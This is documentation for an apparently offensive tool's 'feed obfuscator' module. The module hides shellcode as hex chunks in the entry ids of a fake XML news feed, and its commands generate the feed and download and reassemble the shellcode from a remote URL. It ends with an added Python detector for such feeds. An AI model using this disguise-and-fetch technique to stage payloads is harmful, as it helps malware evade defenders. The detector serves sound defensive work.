Feed Obfuscator

Description

The feed obfuscator splits the shellcode and disguises it as a feed in an XML file. The code is appended to the article.id (the URL in each entry's id element) in chunks of 8 bytes each, written as 16 hex characters:

  <entry>
    <title type="html">Title 1</title>
    <link href="https://www.microloft.com/01/02/title1" rel="alternate" type="text/html" title="Title 1"/>
    <published>2024-12-22 12:43:09.681481</published>
    <updated>2024-12-22 12:43:09.681481</updated>
    <id>https://www.microloft.com/554889e54883ec40</id>
  </entry>
  <entry>
    <title type="html">Title 2</title>
    <link href="https://www.microloft.com/02/02/title2" rel="alternate" type="text/html" title="Title 1"/>
    <published>2024-12-22 12:43:09.681481</published>
    <updated>2024-12-22 12:43:09.681481</updated>
    <id>https://www.microloft.com/4831c0488945f848</id>
  </entry>

The code can also be reassembled by passing the parameters --reassemble and --uri. The feed is then downloaded and processed accordingly.
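
For detection, the layout described above is very regular: every entry id ends in a path segment of exactly 16 hex characters. The following sketch is an added example, not part of ShenCode, that flags feeds with that shape. The function names, the thresholds, the Atom `<feed>` wrapper around the sample entries and the benign sample are assumptions made for illustration.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Final URL path segment that is exactly 16 hex characters (8 bytes), as in the sample feed.
HEX_CHUNK = re.compile(r"^[0-9a-fA-F]{16}$")

def local(tag):
    """Drop an XML namespace such as '{http://www.w3.org/2005/Atom}' from a tag name."""
    return tag.rsplit("}", 1)[-1]

def scan_feed(xml_text, min_entries=2, min_ratio=0.8):
    """Summarise how many entry ids in a feed end in an 8-byte hex chunk."""
    if "<!DOCTYPE" in xml_text or "<!ENTITY" in xml_text:
        # Feeds need no DTD; refuse it rather than expand entities from untrusted XML.
        raise ValueError("DTD or entity declaration in feed")
    root = ET.fromstring(xml_text)
    ids = [child.text.strip()
           for entry in root.iter() if local(entry.tag) == "entry"
           for child in entry if local(child.tag) == "id" and child.text]
    hits = [i for i in ids
            if HEX_CHUNK.match(urlparse(i).path.rstrip("/").rsplit("/", 1)[-1])]
    ratio = len(hits) / len(ids) if ids else 0.0
    return {"entries": len(ids), "hex_ids": len(hits),
            "candidate_bytes": len(hits) * 8,
            # Thresholds are assumptions; tune them against feeds you actually see.
            "suspicious": len(hits) >= min_entries and ratio >= min_ratio}

# Constructed input: the two entries shown above, wrapped in an Atom <feed> root.
SAMPLE_OBFUSCATED = """<feed xmlns="http://www.w3.org/2005/Atom">
  <entry><title type="html">Title 1</title>
    <id>https://www.microloft.com/554889e54883ec40</id></entry>
  <entry><title type="html">Title 2</title>
    <id>https://www.microloft.com/4831c0488945f848</id></entry>
</feed>"""

# Constructed input: an ordinary feed whose ids are readable permalinks.
SAMPLE_BENIGN = """<feed xmlns="http://www.w3.org/2005/Atom">
  <entry><id>https://blog.example/2024/12/22/release-notes</id></entry>
  <entry><id>urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a</id></entry>
</feed>"""

if __name__ == "__main__":
    for name, doc in (("obfuscated", SAMPLE_OBFUSCATED), ("benign", SAMPLE_BENIGN)):
        print(name, scan_feed(doc))
```

A hit is a lead for triage, not proof: legitimate feeds occasionally use short hex identifiers, so correlate with the process that fetched the feed.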

Command

Generate Fake Feed

python shencode.py --input shellcode.raw --output feed.xml

Reassemble Shellcode from Fake Feed

python shencode.py --output shellcode.raw --reassemble --uri https://www.site.com/feed.xml

Example

python shencode.py feed -i calc.raw -o feed.xml

[+] [OBF-RSS] File exists
[i] [OBF-RSS] File: dev\calc.raw
[i] [OBF-RSS] Hash: 7c1bb19fe6606cfe29e750326db2972c4743e623
[+] [OBF-RSS] File exists
[i] [OBF-RSS] File: dev\feed.xml
[i] [OBF-RSS] Hash: 17d3ec2aeb31dad148d4547a1ee8c2edb8846f4b